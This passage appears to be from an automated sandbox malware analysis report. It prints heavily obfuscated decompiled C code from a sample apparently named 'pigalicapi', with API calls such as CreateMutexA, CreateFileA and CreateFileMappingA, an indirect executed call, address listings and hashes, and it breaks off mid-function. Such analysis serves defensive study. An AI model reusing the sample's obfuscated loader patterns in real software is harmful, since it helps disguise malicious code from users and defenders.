                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: d83b6da53ceaacd7df232dfb6fec7c8f3ad1cd7dba3b9315c290fc6d96fd0363
                                                                                                                                                                                                                                                                            • Instruction ID: f9eec2edb8562e59149b43ce98b1cc2eac29f561fa006cfae6f6bb9c86dcad81
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d83b6da53ceaacd7df232dfb6fec7c8f3ad1cd7dba3b9315c290fc6d96fd0363
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6314175A00209FFEB29DFA8C849FEE77B5FB44704F148168F611A6384D7B49680CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                                            			E00C71ED0() {
                                                                                                                                                                                                                                                                            				signed int* _t348;
                                                                                                                                                                                                                                                                            				signed int* _t395;
                                                                                                                                                                                                                                                                            				int _t401;
                                                                                                                                                                                                                                                                            				signed int* _t408;
                                                                                                                                                                                                                                                                            				signed int _t419;
                                                                                                                                                                                                                                                                            				signed int _t423;
                                                                                                                                                                                                                                                                            				signed int _t436;
                                                                                                                                                                                                                                                                            				signed int _t439;
                                                                                                                                                                                                                                                                            				signed int* _t451;
                                                                                                                                                                                                                                                                            				signed int* _t464;
                                                                                                                                                                                                                                                                            				intOrPtr _t503;
                                                                                                                                                                                                                                                                            				signed int* _t505;
                                                                                                                                                                                                                                                                            				intOrPtr _t511;
                                                                                                                                                                                                                                                                            				signed int* _t556;
                                                                                                                                                                                                                                                                            				signed int* _t578;
                                                                                                                                                                                                                                                                            				signed int* _t610;
                                                                                                                                                                                                                                                                            				signed int* _t612;
                                                                                                                                                                                                                                                                            				signed int* _t630;
                                                                                                                                                                                                                                                                            				signed int* _t658;
                                                                                                                                                                                                                                                                            				signed int _t659;
                                                                                                                                                                                                                                                                            				signed int* _t664;
                                                                                                                                                                                                                                                                            				void* _t665;
                                                                                                                                                                                                                                                                            				void* _t666;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t664 = _t665 - 0x68;
                                                                                                                                                                                                                                                                            				_t666 = _t665 - 0xe0;
                                                                                                                                                                                                                                                                            				_t664[0x19] = 0xd0d3a8;
                                                                                                                                                                                                                                                                            				 *(_t664[0x19] + 0x11c) = _t664[0x1e];
                                                                                                                                                                                                                                                                            				_t664[0x16] = 0x2674;
                                                                                                                                                                                                                                                                            				_t664[0x13] = 0x2622;
                                                                                                                                                                                                                                                                            				_t664[0x17] = 0x253b;
                                                                                                                                                                                                                                                                            				_t664[0x18] = 0x2622;
                                                                                                                                                                                                                                                                            				_t664[0x15] = 0x27b9;
                                                                                                                                                                                                                                                                            				_t664[0x14] = 0x253b;
                                                                                                                                                                                                                                                                            				if(_t664[0x15] != (_t664[0x14] ^ 0x000003bc)) {
                                                                                                                                                                                                                                                                            					if(_t664[0x16] < _t664[0x13] - 0x82) {
                                                                                                                                                                                                                                                                            						if( *(_t664[0x19] + 0xbadbb1) == (_t664[0x14] &  *(_t664[0x19] + 0xf4))) {
                                                                                                                                                                                                                                                                            							_t408 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            							if( *0x00D0D420 >= (_t408[0x2eb70c] *  *(_t664[0x19] + 0x98) ^  *0xd0d478)) {
                                                                                                                                                                                                                                                                            								_t664[4] = _t664[0x13] ^  *(_t664[0x19] + 0xe0);
                                                                                                                                                                                                                                                                            								_t664[5] = _t664[0x18] - _t664[0x18] ^  *(_t664[0x19] + 0xe0);
                                                                                                                                                                                                                                                                            								_t511 =  *0xd0d440; // 0x0
                                                                                                                                                                                                                                                                            								_t630 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            								_t92 =  &(_t630[0xc]); // 0x0
                                                                                                                                                                                                                                                                            								_t664[6] = _t511 +  *((intOrPtr*)(_t664[0x19] + 0xb8)) -  *_t92;
                                                                                                                                                                                                                                                                            								CreateMutexA(_t664[4], _t664[5], _t664[6]);
                                                                                                                                                                                                                                                                            								 *(_t664 - 4) = (_t664[0x18] ^ _t664[0x18]) * 0x26d4;
                                                                                                                                                                                                                                                                            								 *_t664 = _t664[0x17] |  *(_t664[0x19] + 0x30);
                                                                                                                                                                                                                                                                            								_t664[1] = _t664[0x18] * 0x00002687 &  *(_t664[0x19] + 0x10c);
                                                                                                                                                                                                                                                                            								_t419 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            								_t664[2] = _t419;
                                                                                                                                                                                                                                                                            								_t664[3] =  *(_t664[0x19] + 0x80) *  *(_t664[0x19] + 0xbadbb1);
                                                                                                                                                                                                                                                                            								_t423 = E00C885E0( *(_t664 - 4),  *_t664, _t664[1], _t664[2], _t664[3]);
                                                                                                                                                                                                                                                                            								_t666 = _t666 + 0x14;
                                                                                                                                                                                                                                                                            								_t664[0x17] = _t423;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t664[0x17] = _t664[0x17] ^ 0x00000313;
                                                                                                                                                                                                                                                                            						_t664[0x13] = _t664[0x13] ^ 0x000001b4;
                                                                                                                                                                                                                                                                            						_t664[0x18] = _t664[0x18] + 0x11;
                                                                                                                                                                                                                                                                            						_t664[0x15] = _t664[0x15] - 0x2b3;
                                                                                                                                                                                                                                                                            						_t664[0x17] = _t664[0x17] ^ 0x000000cd;
                                                                                                                                                                                                                                                                            						_t664[0xd] = _t664[0x14] + 0x2a;
                                                                                                                                                                                                                                                                            						_t664[0xe] = _t664[0x16] + 0x60;
                                                                                                                                                                                                                                                                            						_t664[0xf] = _t664[0x13] - 0x122;
                                                                                                                                                                                                                                                                            						_t664[0x10] = _t664[0x16] - 0x10f;
                                                                                                                                                                                                                                                                            						_t664[0x11] = _t664[0x19];
                                                                                                                                                                                                                                                                            						_t664[0x12] = _t664[0x15] ^ 0x00000335;
                                                                                                                                                                                                                                                                            						_t664[0x18] = E00C73A60(_t664[0xd], _t664[0xe], _t664[0xf], _t664[0x10], _t664[0x11], _t664[0x12]);
                                                                                                                                                                                                                                                                            						_t664[7] = _t664[0x18] - 0x181;
                                                                                                                                                                                                                                                                            						_t664[8] = _t664[0x15] ^ 0x00000324;
                                                                                                                                                                                                                                                                            						_t664[9] = _t664[0x15] + 0x16e;
                                                                                                                                                                                                                                                                            						_t664[0xa] = _t664[0x17] - 0xbd;
                                                                                                                                                                                                                                                                            						_t664[0xb] = _t664[0x16] - 0x10f;
                                                                                                                                                                                                                                                                            						_t436 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            						_t664[0xc] = _t436;
                                                                                                                                                                                                                                                                            						_push(_t664[0xc]);
                                                                                                                                                                                                                                                                            						_push(_t664[0xb]);
                                                                                                                                                                                                                                                                            						_push(_t664[0xa]);
                                                                                                                                                                                                                                                                            						_push(_t664[9]);
                                                                                                                                                                                                                                                                            						_push(_t664[8]);
                                                                                                                                                                                                                                                                            						_push(_t664[7]);
                                                                                                                                                                                                                                                                            						_t439 = E00C74040();
                                                                                                                                                                                                                                                                            						_t666 = _t666 + 0x30;
                                                                                                                                                                                                                                                                            						_t664[0x16] = _t439;
                                                                                                                                                                                                                                                                            						_t664[0x15] = _t664[0x15] + 0x2b3;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t664[0x19] + 0x9c)) = 0xec981;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_t664[0x15] < (_t664[0x16] ^ 0x000002f4)) {
                                                                                                                                                                                                                                                                            					_t664[0x14] = _t664[0x14] -  *0x00D0D434 *  *0xd0d4c8;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x5c) =  *(_t664[0x19] + 0xac) *  *(_t664[0x19] + 0xd0) - 0x2674;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x58) = _t664[0x16] & _t664[0x15] | _t664[0x13];
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x54) = (_t664[0x18] |  *(_t664[0x19] + 0xbadc19)) * 0x253b;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x50) = _t664[0x14] ^ _t664[0x17];
                                                                                                                                                                                                                                                                            					_t451 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x4c) = ( *0x00D0D454 |  *_t451) - 0x2628;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x48) = _t664[0x14] - _t664[0x18] + 0x26d4;
                                                                                                                                                                                                                                                                            					_t556 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            					_t235 =  &(_t556[0x32]); // 0x38f7708d
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x44) = (_t664[0x13] |  *(_t664[0x19] + 0x8c)) +  *_t235;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x40) =  *((intOrPtr*)(_t664[0x19] + 0xbadc39)) - _t664[0x15] +  *((intOrPtr*)(_t664[0x19] + 0xbadc39));
                                                                                                                                                                                                                                                                            					WideCharToMultiByte( *(_t664 - 0x5c),  *(_t664 - 0x58),  *(_t664 - 0x54),  *(_t664 - 0x50),  *(_t664 - 0x4c),  *(_t664 - 0x48),  *(_t664 - 0x44),  *(_t664 - 0x40));
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x78) = (_t664[0x14] |  *(_t664[0x19] + 0x44)) * _t664[0x17];
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x74) = _t664[0x16] -  *(_t664[0x19] + 0xe0) | 0x000026d4;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x70) = ( *(_t664[0x19] + 0xbadbc1) ^ 0x0000253b) -  *(_t664[0x19] + 0x80);
                                                                                                                                                                                                                                                                            					_t348 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            					_t270 =  &(_t348[0x38]); // 0x6
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x6c) = (_t664[0x17] |  *_t270) - 0x25a0;
                                                                                                                                                                                                                                                                            					_t464 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x68) = _t664[0x15] + _t464[0x21];
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x64) = _t664[0x16] +  *((intOrPtr*)(_t664[0x19] + 0x64));
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x60) =  *(_t664[0x19] + 0xd0) |  *0xd0d49c;
                                                                                                                                                                                                                                                                            					CreateFileA( *(_t664 - 0x78),  *(_t664 - 0x74),  *(_t664 - 0x70),  *(_t664 - 0x6c),  *(_t664 - 0x68),  *(_t664 - 0x64),  *(_t664 - 0x60));
                                                                                                                                                                                                                                                                            					_t578 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            					_t664[0x14] = _t664[0x14] | _t578[0x2eb6ec] -  *(_t664[0x19] + 0x30) &  *0x018BB00D;
                                                                                                                                                                                                                                                                            					_t658 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            					_t664[0x17] = _t664[0x17] |  *(_t664[0x19] + 0x10c) - _t658[0x43] - 0x0000253b;
                                                                                                                                                                                                                                                                            					 *(_t664[0x19] + 0xbadc19) = ( *(_t664[0x19] + 0xbadc59) | 0x0000283a) * 0x26e5 +  *(_t664[0x19] + 0xbadc19);
                                                                                                                                                                                                                                                                            					_t664[0x16] = _t664[0x16] ^ (_t664[0x17] | _t664[0x14]) - 0x00002674;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t664[0x16] = _t664[0x16] + 0x9e;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x20) = _t664[0x19];
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x1c)) = _t664[0x18] + 0x5e;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x18) = _t664[0x18] ^ 0x000000af;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x14) = _t664[0x17] ^ 0x00000031;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x10)) = _t664[0x16] + 0x3b;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0xc) = _t664[0x13] ^ 0x00000236;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 8)) = _t664[0x14] + 0x2a;
                                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t664 - 8)));
                                                                                                                                                                                                                                                                            					_push( *(_t664 - 0xc));
                                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t664 - 0x10)));
                                                                                                                                                                                                                                                                            					_push( *(_t664 - 0x14));
                                                                                                                                                                                                                                                                            					_push( *(_t664 - 0x18));
                                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t664 - 0x1c)));
                                                                                                                                                                                                                                                                            					_push( *(_t664 - 0x20));
                                                                                                                                                                                                                                                                            					_t664[0x18] = E00C85750();
                                                                                                                                                                                                                                                                            					_t664[0x16] = _t664[0x16] - 0x2a;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664[0x19] + 0xa8)) = 0xcc0670;
                                                                                                                                                                                                                                                                            					_t664[0x15] = _t664[0x15] ^ 0x00000221;
                                                                                                                                                                                                                                                                            					_t664[0x18] = _t664[0x18] - 0x81;
                                                                                                                                                                                                                                                                            					_t664[0x14] = _t664[0x14] + 0x1aa;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x3c)) = _t664[0x16] - 0x74;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x38)) = _t664[0x13] - 0x1fe;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x34)) = _t664[0x17] - 0xc3;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x30)) = _t664[0x18] - 0x2b3;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x2c) = _t664[0x16] ^ 0x00000d3a;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t664 - 0x28)) = _t664[0x15] - 0x33;
                                                                                                                                                                                                                                                                            					 *(_t664 - 0x24) = _t664[0x19];
                                                                                                                                                                                                                                                                            					_t664[0x17] = E00C87550( *((intOrPtr*)(_t664 - 0x3c)),  *((intOrPtr*)(_t664 - 0x38)),  *((intOrPtr*)(_t664 - 0x34)),  *((intOrPtr*)(_t664 - 0x30)),  *(_t664 - 0x2c),  *((intOrPtr*)(_t664 - 0x28)),  *(_t664 - 0x24));
                                                                                                                                                                                                                                                                            					_t664[0x13] = _t664[0x13] - 0x163;
                                                                                                                                                                                                                                                                            					_t664[0x18] = _t664[0x18] - 0x191;
                                                                                                                                                                                                                                                                            					_t610 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            					if(_t610[0x2b] <= 0xa03) {
                                                                                                                                                                                                                                                                            						_t612 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            						_t659 =  *0xd0d3d8; // 0x0
                                                                                                                                                                                                                                                                            						_t395 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            						 *(_t664[0x19] + 0x14) = _t659 ^ _t612[0x39] ^ _t395[0xa] ^  *(_t664[0x19] + 0x14);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t505 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            						_t185 =  &(_t505[0x35]); // 0x1272000
                                                                                                                                                                                                                                                                            						 *(_t664[0x19] + 0xa4) =  *_t185;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if( *0xd0d404 < 0x2b66) {
                                                                                                                                                                                                                                                                            						_t503 =  *0xd0d4bc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            						_t401 =  *( *(_t664[0x19] + 0xa4))(_t503,  *((intOrPtr*)(_t664[0x19] + 0xcc)) +  *0xd0d4c0,  *(_t664[0x19] + 0x11c)); // executed
                                                                                                                                                                                                                                                                            						 *(_t664[0x19] + 0xf8) = _t401;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				ExitProcess( *(_t664[0x19] + 0xf8));
                                                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                                                            0x00c71ed1
                                                                                                                                                                                                                                                                            0x00c71ed5
                                                                                                                                                                                                                                                                            0x00c71edc
                                                                                                                                                                                                                                                                            0x00c71ee9
                                                                                                                                                                                                                                                                            0x00c71eef
                                                                                                                                                                                                                                                                            0x00c71ef6
                                                                                                                                                                                                                                                                            0x00c71efd
                                                                                                                                                                                                                                                                            0x00c71f04
                                                                                                                                                                                                                                                                            0x00c71f0b
                                                                                                                                                                                                                                                                            0x00c71f12
                                                                                                                                                                                                                                                                            0x00c71f25
                                                                                                                                                                                                                                                                            0x00c71f36
                                                                                                                                                                                                                                                                            0x00c72077
                                                                                                                                                                                                                                                                            0x00c7208d
                                                                                                                                                                                                                                                                            0x00c720af
                                                                                                                                                                                                                                                                            0x00c720c1
                                                                                                                                                                                                                                                                            0x00c720d3
                                                                                                                                                                                                                                                                            0x00c720e1
                                                                                                                                                                                                                                                                            0x00c720ee
                                                                                                                                                                                                                                                                            0x00c720f4
                                                                                                                                                                                                                                                                            0x00c720f7
                                                                                                                                                                                                                                                                            0x00c72106
                                                                                                                                                                                                                                                                            0x00c72118
                                                                                                                                                                                                                                                                            0x00c72124
                                                                                                                                                                                                                                                                            0x00c72140
                                                                                                                                                                                                                                                                            0x00c72143
                                                                                                                                                                                                                                                                            0x00c72148
                                                                                                                                                                                                                                                                            0x00c72164
                                                                                                                                                                                                                                                                            0x00c7217b
                                                                                                                                                                                                                                                                            0x00c72180
                                                                                                                                                                                                                                                                            0x00c72183
                                                                                                                                                                                                                                                                            0x00c72183
                                                                                                                                                                                                                                                                            0x00c720af
                                                                                                                                                                                                                                                                            0x00c71f3c
                                                                                                                                                                                                                                                                            0x00c71f45
                                                                                                                                                                                                                                                                            0x00c71f51
                                                                                                                                                                                                                                                                            0x00c71f5a
                                                                                                                                                                                                                                                                            0x00c71f66
                                                                                                                                                                                                                                                                            0x00c71f72
                                                                                                                                                                                                                                                                            0x00c71f7b
                                                                                                                                                                                                                                                                            0x00c71f84
                                                                                                                                                                                                                                                                            0x00c71f90
                                                                                                                                                                                                                                                                            0x00c71f9b
                                                                                                                                                                                                                                                                            0x00c71fa1
                                                                                                                                                                                                                                                                            0x00c71fad
                                                                                                                                                                                                                                                                            0x00c71fd0
                                                                                                                                                                                                                                                                            0x00c71fe2
                                                                                                                                                                                                                                                                            0x00c71fee
                                                                                                                                                                                                                                                                            0x00c71ff9
                                                                                                                                                                                                                                                                            0x00c72005
                                                                                                                                                                                                                                                                            0x00c72011
                                                                                                                                                                                                                                                                            0x00c72014
                                                                                                                                                                                                                                                                            0x00c72019
                                                                                                                                                                                                                                                                            0x00c7201f
                                                                                                                                                                                                                                                                            0x00c72023
                                                                                                                                                                                                                                                                            0x00c72027
                                                                                                                                                                                                                                                                            0x00c7202b
                                                                                                                                                                                                                                                                            0x00c7202f
                                                                                                                                                                                                                                                                            0x00c72033
                                                                                                                                                                                                                                                                            0x00c72034
                                                                                                                                                                                                                                                                            0x00c72039
                                                                                                                                                                                                                                                                            0x00c7203c
                                                                                                                                                                                                                                                                            0x00c72048
                                                                                                                                                                                                                                                                            0x00c7204e
                                                                                                                                                                                                                                                                            0x00c7204e
                                                                                                                                                                                                                                                                            0x00c71f36
                                                                                                                                                                                                                                                                            0x00c72192
                                                                                                                                                                                                                                                                            0x00c723a4
                                                                                                                                                                                                                                                                            0x00c723c9
                                                                                                                                                                                                                                                                            0x00c723d5
                                                                                                                                                                                                                                                                            0x00c723f0
                                                                                                                                                                                                                                                                            0x00c723f9
                                                                                                                                                                                                                                                                            0x00c72404
                                                                                                                                                                                                                                                                            0x00c72418
                                                                                                                                                                                                                                                                            0x00c72426
                                                                                                                                                                                                                                                                            0x00c7243e
                                                                                                                                                                                                                                                                            0x00c72444
                                                                                                                                                                                                                                                                            0x00c7244a
                                                                                                                                                                                                                                                                            0x00c72474
                                                                                                                                                                                                                                                                            0x00c72497
                                                                                                                                                                                                                                                                            0x00c724b3
                                                                                                                                                                                                                                                                            0x00c724c8
                                                                                                                                                                                                                                                                            0x00c724e8
                                                                                                                                                                                                                                                                            0x00c724ee
                                                                                                                                                                                                                                                                            0x00c724f3
                                                                                                                                                                                                                                                                            0x00c724ff
                                                                                                                                                                                                                                                                            0x00c7250d
                                                                                                                                                                                                                                                                            0x00c7251a
                                                                                                                                                                                                                                                                            0x00c72526
                                                                                                                                                                                                                                                                            0x00c72538
                                                                                                                                                                                                                                                                            0x00c72557
                                                                                                                                                                                                                                                                            0x00c72565
                                                                                                                                                                                                                                                                            0x00c72587
                                                                                                                                                                                                                                                                            0x00c7259d
                                                                                                                                                                                                                                                                            0x00c725bc
                                                                                                                                                                                                                                                                            0x00c725f5
                                                                                                                                                                                                                                                                            0x00c72609
                                                                                                                                                                                                                                                                            0x00c72198
                                                                                                                                                                                                                                                                            0x00c721a0
                                                                                                                                                                                                                                                                            0x00c721a6
                                                                                                                                                                                                                                                                            0x00c721af
                                                                                                                                                                                                                                                                            0x00c721ba
                                                                                                                                                                                                                                                                            0x00c721c3
                                                                                                                                                                                                                                                                            0x00c721cc
                                                                                                                                                                                                                                                                            0x00c721d7
                                                                                                                                                                                                                                                                            0x00c721e0
                                                                                                                                                                                                                                                                            0x00c721e6
                                                                                                                                                                                                                                                                            0x00c721ea
                                                                                                                                                                                                                                                                            0x00c721ee
                                                                                                                                                                                                                                                                            0x00c721f2
                                                                                                                                                                                                                                                                            0x00c721f6
                                                                                                                                                                                                                                                                            0x00c721fa
                                                                                                                                                                                                                                                                            0x00c721fe
                                                                                                                                                                                                                                                                            0x00c72207
                                                                                                                                                                                                                                                                            0x00c72210
                                                                                                                                                                                                                                                                            0x00c72216
                                                                                                                                                                                                                                                                            0x00c72229
                                                                                                                                                                                                                                                                            0x00c72234
                                                                                                                                                                                                                                                                            0x00c72240
                                                                                                                                                                                                                                                                            0x00c72249
                                                                                                                                                                                                                                                                            0x00c72254
                                                                                                                                                                                                                                                                            0x00c72260
                                                                                                                                                                                                                                                                            0x00c7226c
                                                                                                                                                                                                                                                                            0x00c72277
                                                                                                                                                                                                                                                                            0x00c72280
                                                                                                                                                                                                                                                                            0x00c72286
                                                                                                                                                                                                                                                                            0x00c722ad
                                                                                                                                                                                                                                                                            0x00c722b9
                                                                                                                                                                                                                                                                            0x00c722c5
                                                                                                                                                                                                                                                                            0x00c722d0
                                                                                                                                                                                                                                                                            0x00c722e1
                                                                                                                                                                                                                                                                            0x00c7230a
                                                                                                                                                                                                                                                                            0x00c72310
                                                                                                                                                                                                                                                                            0x00c72325
                                                                                                                                                                                                                                                                            0x00c72340
                                                                                                                                                                                                                                                                            0x00c722e3
                                                                                                                                                                                                                                                                            0x00c722e6
                                                                                                                                                                                                                                                                            0x00c722ec
                                                                                                                                                                                                                                                                            0x00c722f2
                                                                                                                                                                                                                                                                            0x00c722f2
                                                                                                                                                                                                                                                                            0x00c7234e
                                                                                                                                                                                                                                                                            0x00c7236a
                                                                                                                                                                                                                                                                            0x00c7237a
                                                                                                                                                                                                                                                                            0x00c7237f
                                                                                                                                                                                                                                                                            0x00c7237f
                                                                                                                                                                                                                                                                            0x00c72385
                                                                                                                                                                                                                                                                            0x00c72616

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateExitMutexProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3437166654-0
                                                                                                                                                                                                                                                                            • Opcode ID: 60d088b9a9da8a680253bb23545f88188d7106d49d32f9ce15b22f3b546c9478
                                                                                                                                                                                                                                                                            • Instruction ID: 7c706ccf51f3d2635841de999f981a018190d5482e5ffaca3d0ba5b8a7e707b9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60d088b9a9da8a680253bb23545f88188d7106d49d32f9ce15b22f3b546c9478
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C42B6B5A002498FDB08CF98D994A9E7BF6FF88304F548229F9199B355D734E841CF94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                                                                            			E00C74040() {
                                                                                                                                                                                                                                                                            				signed int _t227;
                                                                                                                                                                                                                                                                            				signed int _t249;
                                                                                                                                                                                                                                                                            				signed int _t280;
                                                                                                                                                                                                                                                                            				intOrPtr _t286;
                                                                                                                                                                                                                                                                            				signed int _t289;
                                                                                                                                                                                                                                                                            				signed int* _t402;
                                                                                                                                                                                                                                                                            				void* _t404;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t402 = _t404 - 0x60;
                                                                                                                                                                                                                                                                            				_t402[0x15] = _t402[0x1d] - 0x2628;
                                                                                                                                                                                                                                                                            				_t402[0x13] = _t402[0x1a] + 0x181;
                                                                                                                                                                                                                                                                            				_t402[0x16] = _t402[0x1a] ^ 0x00002506;
                                                                                                                                                                                                                                                                            				_t402[0xf] = _t402[0x1b] + 0x65;
                                                                                                                                                                                                                                                                            				_t402[0x10] = _t402[0x1c] ^ 0x000000f3;
                                                                                                                                                                                                                                                                            				_t402[0xe] = _t402[0x1c] ^ 0x0000005c;
                                                                                                                                                                                                                                                                            				_t402[0x14] = _t402[0x1b] - 0x15b;
                                                                                                                                                                                                                                                                            				_t402[0x17] = _t402[0x1c] - 0x2674;
                                                                                                                                                                                                                                                                            				if(_t402[0x15] == _t402[0x17] + 0x2628) {
                                                                                                                                                                                                                                                                            					if( *0x018BB039 >= (_t402[0x16] | _t402[0x16] |  *(_t402[0x1f] + 0x44))) {
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x44) = _t402[0x15] + 0x2506;
                                                                                                                                                                                                                                                                            						_t280 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            						_t172 = _t280 + 0x5c; // 0x1
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x40) = (_t402[0x15] &  *(_t402[0x1f] + 0xf0)) -  *_t172;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x3c) = _t402[0x17] & _t402[0x17];
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x38) = (_t402[0x13] & _t402[0x14]) * 0x2687;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x34) = (_t402[0x13] | 0x000027b9) ^ 0x000025a0;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x30) =  *0x018BAF8D &  *(_t402[0x1f] + 0x30);
                                                                                                                                                                                                                                                                            						CreateFileMappingA( *(_t402 - 0x44),  *(_t402 - 0x40),  *(_t402 - 0x3c),  *(_t402 - 0x38),  *(_t402 - 0x34),  *(_t402 - 0x30));
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					if(_t402[0xe] > _t402[0x14] + 0x2cf) {
                                                                                                                                                                                                                                                                            						_t286 =  *0xd0d470; // 0x38f7708d
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t402[0x1f] + 0x38)) != (_t286 +  *0x018BAF8D & 0x000024c7)) {
                                                                                                                                                                                                                                                                            							_t289 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            							_t150 = _t289 + 0xf4; // 0x0
                                                                                                                                                                                                                                                                            							_t402[0x11] =  *_t150;
                                                                                                                                                                                                                                                                            							while(_t402[0x11] != (_t402[0x17] | _t402[0x17])) {
                                                                                                                                                                                                                                                                            								_t402[0x16] =  *0x00D0D460 *  *0xd0d440 ^ _t402[0x16];
                                                                                                                                                                                                                                                                            								_t402[0x11] = _t402[0x11] + 2;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t402[0x12] =  *(_t402[0x1f] + 0x60);
                                                                                                                                                                                                                                                                            						while(_t402[0x12] <=  *((intOrPtr*)(_t402[0x1f] + 0x68))) {
